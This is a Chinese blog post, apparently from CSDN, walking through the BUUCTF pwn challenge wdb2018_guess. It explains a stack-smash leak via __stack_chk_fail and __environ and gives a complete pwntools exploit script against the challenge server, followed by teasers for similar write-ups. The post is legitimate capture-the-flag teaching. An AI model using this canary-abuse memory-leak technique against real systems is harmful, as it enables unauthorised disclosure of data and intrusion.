[BUUCTF-pwn]——wdb2018_guess (environ环境变量)

最新推荐文章于 2024-02-09 14:54:59 发布
最新推荐文章于 2024-02-09 14:54:59 发布
阅读量1.4k 收藏 3
点赞数 3
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115470540
版权

[BUUCTF-pwn]——wdb2018_guess

这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的.

这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!!

一个常见的保护开启NX canary RELRO

在IDA中看看, 那个buf就是我们要的flag
在这里插入图片描述

先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次.
在这里插入图片描述

思路

思路来了

  1. 利用主动触发canary保护, 调用**___stack_chk_fail**函数, leek出一个地址
  2. 找到对应的libc版本
  3. 在libc中保存了一个函数叫_environ,存的是当前进程的环境变量,通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量, 当然也可以找到我们栈上的数据, 找到buf的地址
  4. 利用buf的地址打印flag
  • 找到多长payload才可以泄露出我们想要的数据0x128
    在这里插入图片描述

exploit

from pwn import *
from LibcSearcher import *
 
#p = process('./GUESS')
p = remote('node3.buuoj.cn',27072)
elf = ELF('./GUESS')
puts_got = elf.got['puts']
 
p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(puts_got))
p.recvuntil('stack smashing detected ***: ')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
log.success('libc_base :' + hex(libc_base))
environ = libc_base + libc.dump('__environ')
info('environ_addr=',hex(environ))
p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(environ))
p.recvuntil('stack smashing detected ***: ')
buf_addr = u64(p.recv(6).ljust(8,'\x00')) - 0x168
log.success('flag_addr=',hex(buf_addr))
p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(buf_addr))
p.interactive()
Y-peak
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 947
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1017
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCYF之“wdb2018_guess
Probeginner的博客
12-18 335
stack smash的使用
[BUUCTF]PWN——wdb2018_guess(stack smashing--canary报错利用)
mcmuyanga的博客
03-14 1294
wdb2018_guess 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况 64位ida载入 存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出 在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称)
wdb2018_guess
z1r0的博客
01-19 1025
wdb2018_guess 查看保护 这里开了canary,溢出时会报错 可以看到报错后面会输出程序名字,既然flag被放到了栈上是不是也可以被输出。 environ是libc中存储栈地址的一个变量,可以通过environ算出与flag的偏移,再将flag通过canary来输出。 想要知道environ的地址还需要知道libc的地址,libc的地址可以通过got来算。 那么第一步就是需要算出argv[0]与gets这个地方ebp-0x40的偏移。 argv[0]的地址为0x7fffffffdeb8,
wdb2018_guess fork()和wait()的问题
carol2358的博客
09-02 394
这个问题困扰了我,程序动脑不如动手,就写了一个程序来判断,问题的来源是wdb2018_guess 这道题 他fork()了三次,却只有3次gets(),我想着明明有4个进程,为什么只gets了3次 #include<stdio.h> #include <sys/types.h> #include <unistd.h> #include<sys/wait.h> int main() { int stat_loc; int i=0; int n=3; in
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 463
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 207
题目截图
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1572
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换
serfend's blog
04-14 515
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo 答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路 发现get_flag的位置 发现输入会被替换,构造exp 详细步骤 查看文件信息 查看题目发现是将用户输入的I替换为you,虽然输入的时候只允许输入32位,但是因为替换
wdb2018_guess与stack smash
Tw0的博客
02-14 208
巩固一下stack smash技术,了解elf程序的运行环境参数。
wdb2018_guess-___stack_chk_fail泄露信息
qq_40712959的博客
11-03 401
背景知识 在程序添加了canary保护后,如果我们读取的bof覆盖了对应的值时,程序就会报错,我们可以利用报错信息。 程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。很简单,只要我们可以控制argv[0],就能知道我们想知道的信息。 void __attribute__ ((noreturn)) __stack_chk_fail (void) { __forti
[BUUTF]-PWN:wdb2018_guess解析(修改argv0)
最新发布
2301_79326813的博客
02-09 359
查看保护查看ida这道题并不复杂,只是要注意一点细节。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 451
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 530
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 301
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3245
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 287
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 258
buuctf-pwn 039~046题
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值